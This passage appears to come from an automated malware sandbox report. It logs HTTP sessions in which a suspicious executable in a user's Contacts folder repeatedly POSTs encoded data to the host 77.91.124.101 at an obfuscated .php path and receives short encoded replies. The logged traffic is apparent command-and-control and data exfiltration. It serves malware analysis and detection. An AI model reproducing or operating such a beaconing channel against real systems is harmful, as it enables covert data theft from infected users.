                                                            Data Ascii: R_]][__Z]WUWU[WRPRX@VTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>82(9?0'[8$&\7*]) %'W&0:R,;><,;^/&G''^)3
                                                            Nov 21, 2023 04:48:38.297655106 CET584INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            107192.168.2.54982277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:38.613940001 CET585OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:38.811933994 CET586INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:38.812347889 CET588OUTData Raw: 52 5a 58 50 5e 5e 5a 5e 5d 57 55 57 55 5e 57 57 50 5b 58 44 56 56 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXP^^Z^]WUWU^WWP[XDVVW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(5<-*#\8B6 9>)0!$-!$#9-8!<<7/.&G''^)7
                                                            Nov 21, 2023 04:48:39.015322924 CET588INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10777.91.124.10180192.168.2.549822C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:38.613940001 CET585OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:38.811933994 CET586INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:38.812347889 CET588OUTData Raw: 52 5a 58 50 5e 5e 5a 5e 5d 57 55 57 55 5e 57 57 50 5b 58 44 56 56 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXP^^Z^]WUWU^WWP[XDVVW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(5<-*#\8B6 9>)0!$-!$#9-8!<<7/.&G''^)7
                                                            Nov 21, 2023 04:48:39.015322924 CET588INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10877.91.124.10180192.168.2.549823C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:39.338498116 CET589OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:39.537868023 CET589INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:39.538080931 CET592OUTData Raw: 57 5d 58 5e 5b 5d 5a 5d 5d 57 55 57 55 5a 57 50 50 5c 58 49 56 51 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]X^[]Z]]WUWUZWPP\XIVQW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(!Y=+W*3;2799(3-$.&& ":?Z ,>&G''^)7
                                                            Nov 21, 2023 04:48:39.741638899 CET593INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            108192.168.2.54982377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:39.338498116 CET589OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:39.537868023 CET589INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:39.538080931 CET592OUTData Raw: 57 5d 58 5e 5b 5d 5a 5d 5d 57 55 57 55 5a 57 50 50 5c 58 49 56 51 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]X^[]Z]]WUWUZWPP\XIVQW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(!Y=+W*3;2799(3-$.&& ":?Z ,>&G''^)7
                                                            Nov 21, 2023 04:48:39.741638899 CET593INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10977.91.124.10180192.168.2.549824C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:39.740168095 CET593OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:39.937958002 CET594INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:39.938183069 CET595OUTData Raw: 57 5c 5d 5b 5b 59 5f 5a 5d 57 55 57 55 5c 57 55 50 53 58 44 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\][[Y_Z]WUWU\WUPSXDVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_);5<+*S)7Z/.\79)^+!'[9'9(=<_8&G''^)/
                                                            Nov 21, 2023 04:48:40.140853882 CET599INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 03 25 3c 2c 5d 21 33 3f 1f 3c 2a 0c 08 2d 2e 25 18 2a 30 31 59 25 13 20 5f 24 07 04 08 3c 3f 2b 01 24 29 0e 54 20 18 01 05 2b 30 21 5a 0c 1d 26 17 36 16 0d 55 29 3d 38 5a 2b 13 28 17 31 08 3b 5e 28 58 2f 1b 20 30 33 5d 26 1d 30 51 2f 01 08 07 2e 16 32 41 31 05 21 07 23 2d 23 5f 0c 14 24 0b 36 32 2f 5e 34 30 32 50 22 0e 34 5d 20 0a 37 54 27 3d 34 56 26 38 2d 1a 2b 2b 2c 54 25 27 2f 0e 33 3a 33 1f 25 2a 37 51 28 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !%<,]!3?<*-.%*01Y% _$<?+$)T +0!Z&6U)=8Z+(1;^(X/ 03]&0Q/.2A1!#-#_$62/^402P"4] 7T'=4V&8-++,T%'/3:3%*7Q(&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            109192.168.2.54982477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:39.740168095 CET593OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:39.937958002 CET594INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:39.938183069 CET595OUTData Raw: 57 5c 5d 5b 5b 59 5f 5a 5d 57 55 57 55 5c 57 55 50 53 58 44 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\][[Y_Z]WUWU\WUPSXDVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_);5<+*S)7Z/.\79)^+!'[9'9(=<_8&G''^)/
                                                            Nov 21, 2023 04:48:40.140853882 CET599INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 03 25 3c 2c 5d 21 33 3f 1f 3c 2a 0c 08 2d 2e 25 18 2a 30 31 59 25 13 20 5f 24 07 04 08 3c 3f 2b 01 24 29 0e 54 20 18 01 05 2b 30 21 5a 0c 1d 26 17 36 16 0d 55 29 3d 38 5a 2b 13 28 17 31 08 3b 5e 28 58 2f 1b 20 30 33 5d 26 1d 30 51 2f 01 08 07 2e 16 32 41 31 05 21 07 23 2d 23 5f 0c 14 24 0b 36 32 2f 5e 34 30 32 50 22 0e 34 5d 20 0a 37 54 27 3d 34 56 26 38 2d 1a 2b 2b 2c 54 25 27 2f 0e 33 3a 33 1f 25 2a 37 51 28 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !%<,]!3?<*-.%*01Y% _$<?+$)T +0!Z&6U)=8Z+(1;^(X/ 03]&0Q/.2A1!#-#_$62/^402P"4] 7T'=4V&8-++,T%'/3:3%*7Q(&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11192.168.2.54972377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:33.223157883 CET185OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:33.420999050 CET186INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:33.421247959 CET188OUTData Raw: 57 58 58 5c 5b 5e 5f 5c 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX\[^_\]WUWU[WTP^X@VPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>8+;)>3'Z8'2[#:6)#.'=>30,8"^<';>&G''^)3
                                                            Nov 21, 2023 04:47:33.625627041 CET188INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:33 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1177.91.124.10180192.168.2.549723C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:33.223157883 CET185OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:33.420999050 CET186INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:33.421247959 CET188OUTData Raw: 57 58 58 5c 5b 5e 5f 5c 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX\[^_\]WUWU[WTP^X@VPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>8+;)>3'Z8'2[#:6)#.'=>30,8"^<';>&G''^)3
                                                            Nov 21, 2023 04:47:33.625627041 CET188INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:33 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11077.91.124.10180192.168.2.549825C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:39.892560959 CET594OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:40.090172052 CET596INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:40.090675116 CET598OUTData Raw: 57 5c 5d 5a 5b 53 5a 5b 5d 57 55 57 55 56 57 56 50 53 58 47 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\]Z[SZ[]WUWUVWVPSXGVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+([<]1?0<8'2] )%_+-&--09"(\8.&G''^)
                                                            Nov 21, 2023 04:48:40.297071934 CET599INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            110192.168.2.54982577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:39.892560959 CET594OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:40.090172052 CET596INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:40.090675116 CET598OUTData Raw: 57 5c 5d 5a 5b 53 5a 5b 5d 57 55 57 55 56 57 56 50 53 58 47 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\]Z[SZ[]WUWUVWVPSXGVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+([<]1?0<8'2] )%_+-&--09"(\8.&G''^)
                                                            Nov 21, 2023 04:48:40.297071934 CET599INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11177.91.124.10180192.168.2.549826C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:40.611051083 CET600OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:40.808887005 CET600INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:40.809181929 CET603OUTData Raw: 57 59 58 5a 5b 5e 5a 5f 5d 57 55 57 55 5c 57 56 50 52 58 41 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYXZ[^Z_]WUWU\WVPRXAVTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*=^<]%>#/"\ 9(3&W'>P0U9(>+<7],&G''^)/
                                                            Nov 21, 2023 04:48:41.011790991 CET603INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:40 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            111192.168.2.54982677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:40.611051083 CET600OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:40.808887005 CET600INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:40.809181929 CET603OUTData Raw: 57 59 58 5a 5b 5e 5a 5f 5d 57 55 57 55 5c 57 56 50 52 58 41 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYXZ[^Z_]WUWU\WVPRXAVTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*=^<]%>#/"\ 9(3&W'>P0U9(>+<7],&G''^)/
                                                            Nov 21, 2023 04:48:41.011790991 CET603INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:40 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            112192.168.2.54982777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:41.333384037 CET604OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
